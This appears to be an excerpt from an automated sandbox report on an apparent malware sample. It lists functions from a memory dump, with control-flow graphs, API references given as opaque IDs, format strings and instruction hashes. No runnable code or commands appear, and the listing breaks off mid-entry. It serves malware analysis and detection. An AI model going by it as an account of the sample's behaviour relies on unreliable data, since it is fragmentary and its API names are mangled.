                                                                                                                                                                                                                                    • 75A38400.USER32(00000000), ref: 028B2703
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000023.00000002.2719283102.00000000028A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000023.00000002.2719283102.0000000002880000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000023.00000002.2719283102.0000000002927000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000023.00000002.2719283102.000000000292A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000023.00000002.2719283102.000000000292D000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000023.00000002.2719283102.0000000002935000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_35_2_2880000_faawXJQQDELvfTymNiVz.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: A38400
                                                                                                                                                                                                                                    • String ID: M_%d_$M_%d_
                                                                                                                                                                                                                                    • API String ID: 2082808161-485321427
                                                                                                                                                                                                                                    • Opcode ID: 014745637fd3095237176fc0622b2f66905bca91611734ea716f2f96a61e94b2
                                                                                                                                                                                                                                    • Instruction ID: 524b3f8c3a9787d7c232d2468d0ebd23e855c6556185a9dec60407ecbb0b5935
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 014745637fd3095237176fc0622b2f66905bca91611734ea716f2f96a61e94b2
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C15171BDC40218ABDB20DB64DC8CBE9B779AF58701F0049D9E64DE6280DBB49AD5CF50
                                                                                                                                                                                                                                    Function 028B174A Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 132COMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 1521 28b174a-28b1822 75A38400 1524 28b1828-28b1832 1521->1524 1525 28b192e-28b195c 1521->1525 1527 28b1843-28b189c 1524->1527 1529 28b191a-28b1928 7686EB20 1527->1529 1530 28b189e-28b18bb call 28a8deb 1527->1530 1529->1525 1534 28b1918-28b191c 1530->1534 1535 28b18bd-28b18f2 1530->1535 1534->1527 1540 28b18fd-28b1905 call 28ae329 1535->1540 1541 28b18f4-28b18fa 1535->1541 1543 28b190a-28b190d 1540->1543 1541->1540 1543->1534
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • 75A38400.USER32(00000000,%s%s,028A2210,028A267C,?,?,00000000,028B8090,028A3FF8,000000FF,?,028B3AFC,80000001), ref: 028B17F8
                                                                                                                                                                                                                                    • 7686EB20.ADVAPI32(?), ref: 028B1928
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000023.00000002.2719283102.00000000028A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000023.00000002.2719283102.0000000002880000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000023.00000002.2719283102.0000000002927000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000023.00000002.2719283102.000000000292A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000023.00000002.2719283102.000000000292D000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000023.00000002.2719283102.0000000002935000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_35_2_2880000_faawXJQQDELvfTymNiVz.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: 7686A38400
                                                                                                                                                                                                                                    • String ID: %s%s
                                                                                                                                                                                                                                    • API String ID: 1693585421-3252725368
                                                                                                                                                                                                                                    • Opcode ID: 221278d337b914a1d744f8b1f43f0d6d9b37e9951873be852d99e5ec2148cb8a
                                                                                                                                                                                                                                    • Instruction ID: 41c4e06cdba5d4dea6cf8f3bc2e580af6b302b5e511cf0c14167eb4fddaf70bd
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 221278d337b914a1d744f8b1f43f0d6d9b37e9951873be852d99e5ec2148cb8a
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C5518279D40258ABDB21DB98DC9CBEEB7B4BF08704F004699E60DE7280DB795A45CF90
                                                                                                                                                                                                                                    Function 028A5A6A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47COMMON
                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 1544 28a5a6a-28a5a89 1546 28a5beb-28a5bf2 1544->1546 1547 28a5a8f-28a5a99 1544->1547 1548 28a5c01-28a5c05 1546->1548 1549 28a5bf4-28a5bfb 7686EB20 1546->1549 1547->1546 1550 28a5a9f-28a5aca 1547->1550 1549->1548 1552 28a5bd9-28a5be6 1550->1552 1553 28a5ad0-28a5b2c 75A38400 1550->1553 1552->1546 1554 28a5b33-28a5b35 1553->1554 1556 28a5b46-28a5b82 1554->1556 1557 28a5b37-28a5b41 1554->1557 1558 28a5bd4 1556->1558 1559 28a5b84-28a5b8a 1556->1559 1557->1552 1558->1552 1560 28a5b91-28a5b9f 1559->1560 1561 28a5ba1-28a5bb2 1559->1561 1562 28a5bb4-28a5bc3 1559->1562 1563 28a5bc5-28a5bd1 1559->1563 1560->1558 1561->1558 1562->1558 1563->1558
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • 75A38400.USER32(00000000,%c%d_%d,6E6F7266,00000005,000003E8), ref: 028A5AF0
                                                                                                                                                                                                                                    • 7686EB20.ADVAPI32(00000000), ref: 028A5BFB
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000023.00000002.2719283102.00000000028A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000023.00000002.2719283102.0000000002880000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000023.00000002.2719283102.0000000002927000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000023.00000002.2719283102.000000000292A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000023.00000002.2719283102.000000000292D000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000023.00000002.2719283102.0000000002935000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_35_2_2880000_faawXJQQDELvfTymNiVz.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: 7686A38400
                                                                                                                                                                                                                                    • String ID: %c%d_%d$fronC:\Windows\
                                                                                                                                                                                                                                    • API String ID: 1693585421-3771101883
                                                                                                                                                                                                                                    • Opcode ID: 376b9ac63292d9a0fb9bd4b94ae3b14fcb80aa76b820a414525ca865102ddec1
                                                                                                                                                                                                                                    • Instruction ID: c7a7dc05d4b95edfcd98cebee15c2d9d2e23afed9fb65fa22ebfe72a9eb1e9be
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 376b9ac63292d9a0fb9bd4b94ae3b14fcb80aa76b820a414525ca865102ddec1
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2111ECB9D41218EBEB24CF94DC98BE9B3B4BB48308F5441C9D10AA6280DB789BC5CF54
                                                                                                                                                                                                                                    Function 028A5AB4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • 75A38400.USER32(00000000,%c%d_%d,6E6F7266,00000005,000003E8), ref: 028A5AF0
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000023.00000002.2719283102.00000000028A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000023.00000002.2719283102.0000000002880000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000023.00000002.2719283102.0000000002927000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000023.00000002.2719283102.000000000292A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000023.00000002.2719283102.000000000292D000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000023.00000002.2719283102.0000000002935000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_35_2_2880000_faawXJQQDELvfTymNiVz.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: A38400
                                                                                                                                                                                                                                    • String ID: %c%d_%d$fronC:\Windows\
                                                                                                                                                                                                                                    • API String ID: 2082808161-3771101883
                                                                                                                                                                                                                                    • Opcode ID: 2fe5dd882e46da301873ac46fd8b180e03e2d82d2233f5fc7fd1835660b27102
                                                                                                                                                                                                                                    • Instruction ID: 964d82cfaafc2e36aa4b468159c5635f832f953b3a044ead6d8c945c120ea05a
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2fe5dd882e46da301873ac46fd8b180e03e2d82d2233f5fc7fd1835660b27102
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B401D2B994111CEBEB24CF95DC98BE9B3B4BB58304F5045C8E10AA6140DB749BC5CF54
                                                                                                                                                                                                                                    Function 028A4BF9 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 83COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • 75A38400.USER32(?,028A3C48,00000008), ref: 028A4C2F
                                                                                                                                                                                                                                    • 7686EB20.ADVAPI32(?), ref: 028A4D6F
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000023.00000002.2719283102.00000000028A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000023.00000002.2719283102.0000000002880000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000023.00000002.2719283102.0000000002927000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000023.00000002.2719283102.000000000292A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000023.00000002.2719283102.000000000292D000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000023.00000002.2719283102.0000000002935000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_35_2_2880000_faawXJQQDELvfTymNiVz.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: 7686A38400
                                                                                                                                                                                                                                    • String ID: fronC:\Windows\
                                                                                                                                                                                                                                    • API String ID: 1693585421-3143526458
                                                                                                                                                                                                                                    • Opcode ID: a764d8c8946b2c2c86e36c991c20e49a413a08aac2ec652a1d47799680410900
                                                                                                                                                                                                                                    • Instruction ID: aa54505ab6153baa48c89e610753bc796fab75220d47311e33e1c4cdbf4cd42a
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a764d8c8946b2c2c86e36c991c20e49a413a08aac2ec652a1d47799680410900
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AC31197DD40118AFDB18CF14CCA59D9F775EB59305F008598E70AAB241DBB0AAC1CF90
                                                                                                                                                                                                                                    Function 028B2EBC Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 82COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000023.00000002.2719283102.00000000028A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000023.00000002.2719283102.0000000002880000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000023.00000002.2719283102.0000000002927000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000023.00000002.2719283102.000000000292A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000023.00000002.2719283102.000000000292D000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000023.00000002.2719283102.0000000002935000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_35_2_2880000_faawXJQQDELvfTymNiVz.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: 7686
                                                                                                                                                                                                                                    • String ID: >
                                                                                                                                                                                                                                    • API String ID: 3028004676-325317158
                                                                                                                                                                                                                                    • Opcode ID: c414aaa8ddaea8e47d60f7ef17e7a96403b834dc71856c9fbdf927a331159e81
                                                                                                                                                                                                                                    • Instruction ID: d9053e8bd8b79c11bbcfd56cc91ddda8e2ac76b030bf8611a44e085c4cfd5822
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c414aaa8ddaea8e47d60f7ef17e7a96403b834dc71856c9fbdf927a331159e81
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3131907D9402189BD721DB58CC48BE9B379EB69304F0086CDEA4DA7384CBB45AD5CF90
                                                                                                                                                                                                                                    Function 028AA553 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 76COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • 75A38400.USER32(00000000,028A22B4,00000000), ref: 028AA635
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000023.00000002.2719283102.00000000028A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000023.00000002.2719283102.0000000002880000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000023.00000002.2719283102.0000000002927000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000023.00000002.2719283102.000000000292A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000023.00000002.2719283102.000000000292D000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000023.00000002.2719283102.0000000002935000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_35_2_2880000_faawXJQQDELvfTymNiVz.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: A38400
                                                                                                                                                                                                                                    • String ID: 46390628699
                                                                                                                                                                                                                                    • API String ID: 2082808161-4273875350
                                                                                                                                                                                                                                    • Opcode ID: fbb413aa9a7daae32427201170480854b448a18549e07a706f635d152d0275f0
                                                                                                                                                                                                                                    • Instruction ID: a4bb05bf810ad8b5262e8e150b17edfd507339f2d42538871fc390d407005df0
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fbb413aa9a7daae32427201170480854b448a18549e07a706f635d152d0275f0
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 48315E7E940118AFDB14DB6CDC58BE677B9EB48700F0089A8F20D93285DF745A968F50
                                                                                                                                                                                                                                    Function 028A511E Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • 75A38400.USER32(?,028A3C54,00000008), ref: 028A5153
                                                                                                                                                                                                                                    • 7686EB20.ADVAPI32(?), ref: 028A543A
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000023.00000002.2719283102.00000000028A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000023.00000002.2719283102.0000000002880000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000023.00000002.2719283102.0000000002927000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000023.00000002.2719283102.000000000292A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000023.00000002.2719283102.000000000292D000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000023.00000002.2719283102.0000000002935000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_35_2_2880000_faawXJQQDELvfTymNiVz.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: 7686A38400
                                                                                                                                                                                                                                    • String ID: fronC:\Windows\
                                                                                                                                                                                                                                    • API String ID: 1693585421-3143526458
                                                                                                                                                                                                                                    • Opcode ID: b98541fd7ffdffbea83e63d8cb2396bb4daa64de2c147404d821c52407566a2c
                                                                                                                                                                                                                                    • Instruction ID: b9996c0e206e8a55102530d1dfef4f395e2e6df17bfc248f320f7c356a79b604
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b98541fd7ffdffbea83e63d8cb2396bb4daa64de2c147404d821c52407566a2c
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 20F03779941128DBEB30CB14CD84AE9F378FB54304F4855C8E629A6180CB369B98CF54
                                                                                                                                                                                                                                    Function 028A8F51 Relevance: 3.1, APIs: 2, Instructions: 110COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • 75A38400.USER32(00000000,028A2F00,00000104,00000000), ref: 028A906B
                                                                                                                                                                                                                                    • 7686EB20.ADVAPI32(028A9F2F), ref: 028A90AF
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000023.00000002.2719283102.00000000028A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000023.00000002.2719283102.0000000002880000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000023.00000002.2719283102.0000000002927000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000023.00000002.2719283102.000000000292A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000023.00000002.2719283102.000000000292D000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000023.00000002.2719283102.0000000002935000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_35_2_2880000_faawXJQQDELvfTymNiVz.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: 7686A38400
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 1693585421-0
                                                                                                                                                                                                                                    • Opcode ID: ac504c3de9d6187de7b72c56277d177a217dea543d17ce8f561593bd5fed05e2
                                                                                                                                                                                                                                    • Instruction ID: 7adcd01e8c0b087834edb479a15df3e5cb581fb60f224a3b122bac966d1733ed
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ac504c3de9d6187de7b72c56277d177a217dea543d17ce8f561593bd5fed05e2
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 784130BDA04248EBEB14CB98CC94BDEB7B9AB48704F108598E309F6180DB745A49CF95
                                                                                                                                                                                                                                    Function 028B2E32 Relevance: 3.1, APIs: 2, Instructions: 54COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000023.00000002.2719283102.00000000028A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000023.00000002.2719283102.0000000002880000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000023.00000002.2719283102.0000000002927000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000023.00000002.2719283102.000000000292A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000023.00000002.2719283102.000000000292D000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000023.00000002.2719283102.0000000002935000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_35_2_2880000_faawXJQQDELvfTymNiVz.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: 7686
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3028004676-0
                                                                                                                                                                                                                                    • Opcode ID: ef21814d519ba3ee6d21fea6be212a430f616a7b3b45893f54785796119a974e
                                                                                                                                                                                                                                    • Instruction ID: 897810a17cb18c1120d154f85666ca7ddbe52fc8ad2214577e14f06535e93a8d
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ef21814d519ba3ee6d21fea6be212a430f616a7b3b45893f54785796119a974e
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2511ECBDA40208BBDB05DF94DD89FAE77B8AB48700F104548FB09E7284DB70AA15DB50
                                                                                                                                                                                                                                    Function 028B1D8F Relevance: 1.6, APIs: 1, Instructions: 72COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000023.00000002.2719283102.00000000028A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000023.00000002.2719283102.0000000002880000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000023.00000002.2719283102.0000000002927000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000023.00000002.2719283102.000000000292A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000023.00000002.2719283102.000000000292D000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000023.00000002.2719283102.0000000002935000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_35_2_2880000_faawXJQQDELvfTymNiVz.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: 7686
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3028004676-0
                                                                                                                                                                                                                                    • Opcode ID: dfae84c27e19d79f50dd58a451261e5d6c9aade55d3adc98f69264a8bdf7a709
                                                                                                                                                                                                                                    • Instruction ID: f9acc8845989286d2c2da5f0a09ab10accae75d6dca39ded6da3653f6e945831
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: dfae84c27e19d79f50dd58a451261e5d6c9aade55d3adc98f69264a8bdf7a709
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 24216D7DD00218ABDB218B64CC59BE9B778AB58704F1045D8E24DEA2C0DBF06AC48F91
                                                                                                                                                                                                                                    Function 028B0B9A Relevance: 1.6, APIs: 1, Instructions: 51COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000023.00000002.2719283102.00000000028A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000023.00000002.2719283102.0000000002880000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000023.00000002.2719283102.0000000002927000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000023.00000002.2719283102.000000000292A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000023.00000002.2719283102.000000000292D000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000023.00000002.2719283102.0000000002935000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_35_2_2880000_faawXJQQDELvfTymNiVz.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: A38400
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2082808161-0
                                                                                                                                                                                                                                    • Opcode ID: 90d84b26c2e2e2ff5adf48032d973dc6b83c147a6fe0e660ebfe73d88003a9c5
                                                                                                                                                                                                                                    • Instruction ID: 820e0918add0b8332addbfdc130cb67ff27de250a7153af306d517420e3fc83f
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 90d84b26c2e2e2ff5adf48032d973dc6b83c147a6fe0e660ebfe73d88003a9c5
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0F1182BD980208ABEB209B68DC4DBFA7778BB44705F0049A8B709F62C1DB745A578F54
                                                                                                                                                                                                                                    Function 028A58E9 Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • 75A38400.USER32(00000000,%c%d_%d,6E6F7266,00000005,000003E8), ref: 028A5983
                                                                                                                                                                                                                                    • 75A38400.USER32(00000000,%c%d_%d,6E6F7266,00000005,000003E8), ref: 028A5AF0
                                                                                                                                                                                                                                    • 7686EB20.ADVAPI32(00000000), ref: 028A5BFB
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000023.00000002.2719283102.00000000028A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 02880000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000023.00000002.2719283102.0000000002880000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000023.00000002.2719283102.0000000002927000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000023.00000002.2719283102.000000000292A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000023.00000002.2719283102.000000000292D000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000023.00000002.2719283102.0000000002935000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_35_2_2880000_faawXJQQDELvfTymNiVz.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: A38400$7686
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 1720462038-0
                                                                                                                                                                                                                                    • Opcode ID: a7c6e0e4e19d7cd7371980705d5460a257a6e42f899921d8fa5aedd31e595d2d
                                                                                                                                                                                                                                    • Instruction ID: 06c5e8e31d32f2b4a9b0e55bb81439cf2ab1bf7793545e393ef61fecf8c53e06
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a7c6e0e4e19d7cd7371980705d5460a257a6e42f899921d8fa5aedd31e595d2d
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0BF0E738E01118DBEB24DF98E9A87A9B3B1BF48319F5441D9D40EA7250DB389AD1CE44
                                                                                                                                                                                                                                    Function 024706D1 Relevance: .3, Instructions: 256COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    Memory Dump Source
